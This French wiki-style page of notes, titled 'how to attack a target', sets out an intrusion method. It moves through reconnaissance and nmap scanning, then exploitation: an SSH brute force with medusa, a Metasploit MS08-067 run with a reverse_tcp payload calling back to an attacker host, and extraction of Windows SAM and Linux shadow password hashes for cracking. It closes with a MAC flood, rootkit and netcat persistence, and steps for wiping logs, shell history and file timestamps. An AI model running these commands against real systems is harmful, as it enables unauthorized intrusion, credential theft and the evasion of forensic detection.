meta données pour cette page
Comment attaquer une cible ?
Méthode d'analyse
Pour attaquer une cible, il faut d'abord la connaître et cela se réalise en plusieurs étape (et de manière cyclique) :
Reconnaissance
Instervention sur les sites :
- HTTrack : pour aspirer tout le contenu d'un site web
- Google : en utlisant des mot-clés dans la barre de recherche comme : cache:toto.com + filetype:pdf + inurl:admin
- whois : pour obtenir des infos sur le détendeur du domaine : https://whois-search.com/
- robtex.com : pour créer une carte d'infra disponible publiquement (DMZ?)
- http://toolbar.netcraft.com/site_report pour obtenir l’historique du site web
- Metagoofil : recherche des documents spécifique
mkdir files ./metagoofil.py -d syngress.com -t pdf,doc,xls,pptx -n 20 -o files -f results.html
Intervention sur les DNS :
apt-get install fierce
Scan
Cette deuxième phase consiste à associer aux adresses IP des ports et des services.
- Audit d'une AD : https://www.information-security.fr/audit-lactive-directory-bta/
- Analyse des ports en temps réel : http://www.cyberciti.biz/faq/linux-detect-port-scan-attacks/
- fping -a -g -q 192.168.1.0/24
- Scan TCP (très rapide < 1024) : nmap -F 192.168.1.10
- Scan TCP Connect : nmap -sT -p- -Pn 192.168.1.1-254
- Scan Syn : nmap -sS -p- -Pn 192.168.1.10
- Scan UDP : nmap -sU(+V pour forcer l'obtention d'avoir une réponse) 192.168.1.10
- Scan Xmas (Avec flag FIN,PSH et URG, page 72) : nmap -sX -p- -Pn 192.168.1.10
- Scan Null : nmap -sN -p- -Pn 192.168.1.10
Ces différents types de scan sont décrit ici : https://www.information-security.fr/les-scans-ports-via-tcp-xmas-null-ack/
- Scan avec une sortie : nmap –script [banner|vuln|exploit|intrusive] 192.168.1.10
- jodies.de/ipcalc : trouver la passerelle
- OpenVAS, concurrent libre de nessus ou mais encore de Core Impact, Metaspoit Pro, NeXpose…
- wpscan : https://github.com/wpscanteam/wpscan
- spipscan : https://github.com/PaulSec/SPIPScan
- reverseip : recherche tous les domaines raccordé à l'IP : https://n0where.net/reverse-ip-lookup-tool-revip/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+n0where+%28CyberPunk%29
- conntrack [-L|-F]
Exploitation
Cette troisième phase concerne l'exploitation / le crackage / le force brute d'un accès au départ non autorisé.
- medusa -h 192.168.0.10 -u root -P /usr/share/john/password.lst -M ssh
- msfconsole de metasploit, utile pour réaliser des exploits sur des machines distantes
- msfupdate pour mettre à jour la base de metasploit
- booters
- cert-fr
- saleskyhack.com (?)
- Havij : injection SQL
hping3 -i ul -S -p 80 192.168.42.1
Pour contrer la commande ci-dessus: il faut ajouter une règle de filtrage spécifique au blocage des paquets SYN.
Exemple d'utilisation :
search ms08-067 use exploit/windows/smb/ms08_067_netcpi show payloads set payload window/vncinject/reverse_tcp show options set RHOST 192.168.1.10 set LHOST 192.168.1.50 exploit
Les bind = exploit et connexion vers la cible les reverse = exploit vers la cible et la connexion vers l'attaquant
Pour aller plus loin, il existe meterpreter et Armitage qui est comme metasploit mais en mode graphique.
- John –test : permet d'obtenir le nombre de coups par seconde (c/s) (benchmark)
Récupérer les mots de passe windows :
Récup des fichiers SAM et SYSTEM dans /windows/System32/config/ puis :
samdump2 SYSTEM SAM > mdp.txt John mdp.txt --format=nt (?)
Redéfinir la config des utilisateurs :
chntpw -i /Windows/System32/config/SAM
Récupérer les mots de passe Linux :
unshadow /etc/passwd /etc/shadow > mdp.txt john mdp.txt
Flood sur un commutateur :
macof -i eth0 -s IP_source -d IP_destination
Scan de vulnérabilités effectué par nikto :
mikto -h ip_distante -p 80,443
- w3af pour scanner et exploiter ces failles
- webscarab qui indexe un site (liste les pages liées entre elles) + capable d'intercepter les requêtes
- Intercepter les requêtes avec ZAP (OWASP) + scan + indéxation
Maintien de l'accès
Outils :
- netcat, cryptcat (voir ci-dessous)
- hacker defender
- rootkit
- revealer
- vice
- blacklight (f-secure)
Supprimer ses traces
Il faut repérer la date d'accès au système, puis éffacer dans les fichiers de logs (/var/logs/wtmp, var/log/auth.log, /var/log/syslog eventuellement ) et logs applicatifs suivant leur configurations. Ce n'est pas simple pour utmp et wtmp, car ils sont dans un format particulier, qui nécessite un programme dédié (clear + utmpdump + …) Supprimer l'historique de l'utilisateur (~/.bash_history si on est en bash et celui de root). Changer les dates de modification et de lecture des fichiers édités pour leur remettre l'ancienne date (touch m a t <date>). Néanmoins, une trace reste visible avec la commande stat Enfin, à la déconnexion, de nouvelles logs seront posés.